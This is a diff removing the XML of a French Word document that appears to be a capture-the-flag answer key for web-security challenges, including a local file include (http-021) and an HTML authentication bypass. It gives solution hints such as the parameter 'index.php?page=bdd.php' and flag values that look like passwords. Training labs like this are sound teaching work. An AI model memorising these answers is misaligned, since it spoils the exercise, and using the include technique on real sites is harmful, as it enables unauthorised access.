-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>hDufjdki156</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille B : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>ADufjdki156</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http-021</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Catégorie de la faille </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Objectif de la faille : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Include</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Les </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>includes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> c'est pas sécure et les commentaires non </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>plus..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7610E4DD" wp14:editId="0128EE72">
-            <wp:extent cx="5760720" cy="911225"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
-            <wp:docPr id="3" name="Image 3"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="911225"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Utiliser le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>get</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> page pour entrer sur le serveur, et regarder le code source de la page </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>bdd.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>index.php?page</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>bdd.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>M0nmdp$ecure123</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille B : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>M4bddest$ecure123</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http-022</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Catégorie de la faille </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Objectif de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Bypass html identification</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Contourner l'identification html et trouvez le mot de passe pour valider l'épreuve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
